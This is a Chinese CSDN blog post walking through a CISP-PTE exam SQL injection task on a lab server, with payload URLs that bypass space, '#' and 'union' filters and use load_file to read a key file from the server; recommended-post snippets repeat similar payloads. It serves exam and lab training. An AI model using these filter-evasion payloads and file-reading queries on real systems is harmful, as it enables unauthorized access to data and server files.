PTE考试解析

最新推荐文章于 2024-07-03 14:53:26 发布
最新推荐文章于 2024-07-03 14:53:26 发布
阅读量872 收藏
点赞数 1
分类专栏: 漏洞相关 文章标签: 安全 系统安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79194110/article/details/133818367
版权

Pte 考试题目

  1. 注入漏洞

空格被过滤

7969ca3861904d8fb01be06ce65abb0d.png

用/**/代替空格,发现#被过滤

569839e071f14312aac40977ddfe60b9.png

对#进行url编码为%23

87117733b39b4689b827eca82c12c231.png

输入构造好的payload

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=1%23

7f435ce13af847309671d78c9e23181d.png

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2%23

68fe4a03cf9b4d39a2536b765ceb031b.png

输入order by 1  显示正常

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/order/**/by/**/1%23

a96847e65e3844e3b94debff6ee39caf.png

输入order by 2  显示正常

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/order/**/by/**/2%23

7aac062200cf4746841232eed4b2bd53.png

输入order by 3  显示正常

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/order/**/by/**/3%23

45ab7b7f140340d0a55fcde90a27e506.png

输入order by 4  显示正常

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/order/**/by/**/4%23

6c135326e5d845a2869812ddde059840.png

输入order by 5  出现错误,说明字段只存在4

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/order/**/by/**/5%23

0485062dd0574e8abb3074f8811528dd.png

输入union select 1,2,3,4  union被过滤采用双写绕过

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/union/**/select/**/1,2,3,4%23

f5e13f938c944beb908bea92fe94dd73.png

union被过滤采用双写绕过  没有显示出来字段号

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/ununionion/**/select/**/1,2,3,4%23

db344c640d644a46a252856c3958e297.png

采用and 和 or 测试

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2/**/ununionion/**/select/**/1,2,3,4%23

2.3.4有显示

d7417f6e489445419cb4ae8657b0b49d.png

 

读文件使用load_file根据提示读取这个文件load_file(%27/tmp/360/key%27),进行尝试

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2/**/ununionion/**/select/**/1,load_file(%27/tmp/360/key%27),3,4%23


92f5fa155ae542d89405909a61e2d925.pnghttp://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2/**/ununionion/**/select/**/1,2,load_file(%27/tmp/360/key%27),4%23

38bbf39130354c07b11964d3017f1842.png

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2/**/ununionion/**/select/**/1,2,3,load_file(%27/tmp/360/key%27)%23

34b9a05586ee403d8b1e0d6460ca9a71.png

 

布满杂草的荆棘
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pte模拟考试_PTE考试题型详解
weixin_40006185的博客
12-18 1494
关于PTE考试,首先要了解它有哪些题型,正确的解题姿势是什么,下面小编给大家分享一下关于PTE考试题型。第一步:熟悉PTE考试的题型第1次接触PTE考试时,首先需要做的是熟悉PTE考试的题型以及整个考试流程。PTE考试与雅思、托福等考试非常不同,几乎没有完全一样的题型。所以,备战PTE的第1步绝dui是弄清PTE的20类题型。同时必须强调的是,PTE考试不同于雅思考试,听说读写四项分数是互相影响的...
PTE-Test-Helper:PTE密钥王练习
04-29
PTE-Test-Helper 的设计与PTE考试紧密相关,为用户提供了一个仿真环境,以便他们在实际考试前进行充分的准备。 JavaScript作为该工具的核心技术,起到了至关重要的作用。JavaScript是一种常用的前端编程语言,用于...
基础题目之SQL注入
king丶
07-31 1688
http://11.1.10.27:34041/vulnerabilities/fu1.php?id=1')--%20 这样执行一个结果,你会发现-- 没有起到注释的作用 说明这个地方不能使用空格 http://11.1.10.27:34041/vulnerabilities/fu1.php?id=1')# //#经过url编码变成%23 http://11.1.10.27:34041/vulnerabilities/fu1.php?id=1')%23 发现返回
CISP-PTE靶机测试记录
Jach1n
01-31 1192
CISP-PTE靶机测试记录
【CTF题】使用文件包含漏洞读取网页代码
热门推荐
keysking瞎写东西的地方
01-25 2万+
【CTF题】使用文件包含漏洞读取网页代码按照我的理解文件包含漏洞是指网页后端php(或其他)代码中使用了include等文件包含语句,而且所包含的文件由变量控制,恰恰此变量又能通过GET或POST等方式进行修改所造成的。1.直接包含内有运行代码的文件比如有一index.php<?php include $_GET['file']; ?>那么就可以通过抓包修改file值的办法去运行一些本来不该运行
cisp-pte考试经验分享
乌云毕力格博客
07-16 7267
CISP-PTE 注册渗透测试工程师考试 总结&&经验分享 cisp视频教程:https://download.csdn.net/download/asd2588258/20323819 前几天刚在西安考完了PTE考试,在四叶草十天的学习感觉也是收获满满。 首先,先总结一下考试的内容。题型分为选择题和实操题两部分。满分为100分,选择题有20道,共20分,主要考查一下安全方面的基础知识。 剩下的为80分的实操题,分为6个大题。 SQL注入(通常为mysql数据库) 文件上传漏洞 文件包含
cisp-pte注册渗透测试工程师详细资料及视频教程
07-16
总的来说,这个资源包为准备CISP-PTE考试和提升渗透测试技能提供了全面的学习资源。通过系统学习讲义、实战模拟、观看视频教程和分析源码,考生可以深入理解网络安全原理,掌握渗透测试的方法和技术,从而提升自己的...
cisp20210414试题与考卷.pdf
04-14
CISP最新题库,包含653道试题和10套试卷,试题有分析讲解。
CISP试题及复习资料.pdf
04-15
【CISP试题解析】 1. 信息安全的基本要素包括保密性、完整性和可用性,这三个要素是信息安全的基础。保密性确保信息只被授权的个人或实体访问,完整性保证信息未经许可不被修改,可用性则确保信息在需要时能被合法...
CISP全套考试题目带答案
11-27
以下是对“CISP全套考试题目带答案”这一资源的详细解析: 1. **历年CISP考试题目**:这些题目代表了CISP考试的历史趋势,可以帮助考生了解考试的格式、题型以及重点内容。历年试题通常包括选择题、判断题、简答题...
SQL注入读取文件之各种绕过姿势
小白渣的博客
02-27 1511
目录 回显判断注入点 确定过滤类型 各种绕过姿势注入  0x00环境介绍 目标地址: http://172.16.12.100:81  注入要求:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。    0x01渗透思路 进入答题后,显示为使用select * from article where id= ('1')...
CTF的sql注入、文件包含、文件上传突破等五道题
hclimg的博客
12-28 3258
使用win7建立一个ctf的环境,在本地测试实验 新手练习,在网上找了很多的资料   1、sql注入     http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)--+ http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)or...
Akamai+Noname强强联合 | API安全再加强
最新发布
AKAMAI_CHINA的博客
07-03 1043
最近,Akamai正式完成了对Noname Security的收购。本文我们将向大家介绍,经过本次收购后,Akamai在保护API安全性方面的后续计划和未来愿景。Noname Security是市场上领先的API安全供应商之一,此次收购将让Akamai能更好地满足日益增长的客户需求和市场要求。具体来说,Akamai将能借助本次收购扩展API流量方面的情报,满足客户可能提出的,与业务、集成或部署要求有关的任何问题。
安全隔离上网的有效途径:沙箱
Canon_YK的博客
07-01 548
沙箱技术,顾名思义,就像是在计算机系统中构建一个“沙箱”,将应用程序或系统进程的运行限制在这个“沙箱”内,使其无法访问或修改系统核心资源,从而达到隔离的效果。沙箱技术作为一种高效的隔离机制,为企业和个人提供了一种在享受网络便利的同时,保障系统安全的解决方案。浏览器级别沙箱是另一种常见的沙箱技术实现方式。目前也只有深信达的沙箱技术是可以运行和控制虚拟机的,将整个磁盘进行加密可以很好地进行控制,如果企业安全需求比较高可以采用全盘加密的方式,一般情况下隔离出虚拟空间的轻型沙箱就可以满足轻量化办公的需求。
cisp-pte考试
09-30
CISP-PTE考试是一种专门针对信息安全领域的认证考试。CISP代表“认证信息安全专家”,而PTE代表“专业技能审定”,因此CISP-PTE考试旨在测试考生在信息安全方面的专业知识和技能。 CISP-PTE考试的内容包括多种信息...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值